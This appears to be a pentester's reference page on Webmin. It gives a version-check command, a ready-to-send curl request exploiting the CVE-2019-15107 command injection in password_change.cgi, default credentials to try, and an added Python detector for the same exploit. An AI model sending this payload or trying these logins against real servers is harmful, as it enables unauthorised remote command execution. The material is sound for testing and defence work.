Webmin

What it is: Web-based system administration tool for Unix/Linux. Manages users, services, configs through a browser interface. Usually runs on port 10000 with HTTPS.

Default ports: 10000

Vuln research:

Identify Webmin version

Usually on port 10000; the version string is often visible in the login page source

curl -sk https://$IP:10000/ | grep -i version

Webmin RCE (CVE-2019-15107)

Unauthenticated RCE on Webmin 1.890-1.920, a password reset backdoor: with expired=2, the value of the `old` field in password_change.cgi reaches a shell unescaped (`old=id%7Cid` is URL-encoded `id|id`)

curl -sk "https://$IP:10000/password_change.cgi" -d 'user=root&pam=&expired=2&old=id%7Cid&new1=test&new2=test'
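Defender-side checks for the two items above (an added example, not part of these notes): a version-range test against the CVE-2019-15107 window listed here (1.890-1.920), and an inspection of password_change.cgi POST bodies for shell metacharacters in the `old` field, which is what the payload above relies on. Banners and request bodies are constructed samples; the version regex assumes Webmin's x.yyy numbering.

```python
"""Checks for the Webmin findings above (added example, not from the original
notes). Sample banners and request bodies below are constructed."""
import re
from urllib.parse import parse_qs

VULN_MIN, VULN_MAX = (1, 890), (1, 920)   # CVE-2019-15107 range as given on this page
SHELL_META = re.compile(r"[|;&`$(){}<>\n]")  # characters a plain password field should not need

def parse_version(banner: str):
    """Pull the first x.yyy version out of login-page text such as
    'Webmin 1.910 on host'. Returns (major, minor) or None."""
    m = re.search(r"\b(\d+)\.(\d{3})\b", banner)
    return (int(m.group(1)), int(m.group(2))) if m else None

def in_cve_2019_15107_range(banner: str) -> bool:
    """True when the banner's version falls inside 1.890-1.920."""
    v = parse_version(banner)
    return v is not None and VULN_MIN <= v <= VULN_MAX

def suspicious_password_change(method: str, path: str, body: str) -> bool:
    """Flag a password_change.cgi POST whose 'old' value carries shell
    metacharacters. Legitimate clients submit a plain password here."""
    if method.upper() != "POST" or not path.endswith("/password_change.cgi"):
        return False
    params = parse_qs(body, keep_blank_values=True)  # parse_qs URL-decodes values
    old = params.get("old", [""])[0]
    return bool(SHELL_META.search(old))

# constructed samples: one vulnerable banner, one patched, one with no version
BANNERS = ["Webmin 1.910 on webmin.example.internal", "Webmin 1.930 on host", "no banner"]
EXPLOIT_BODY = "user=root&pam=&expired=2&old=id%7Cid&new1=test&new2=test"
BENIGN_BODY = "user=alice&pam=&expired=0&old=Hunter2%21&new1=x&new2=x"

if __name__ == "__main__":
    for b in BANNERS:
        print(b, "->", in_cve_2019_15107_range(b))
    print(suspicious_password_change("POST", "/password_change.cgi", EXPLOIT_BODY))  # True
    print(suspicious_password_change("POST", "/password_change.cgi", BENIGN_BODY))   # False
```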

Default credentials

Common Webmin logins; check for password reuse with system accounts

# root:<system password>
# admin:admin
# Webmin uses PAM by default, so system credentials work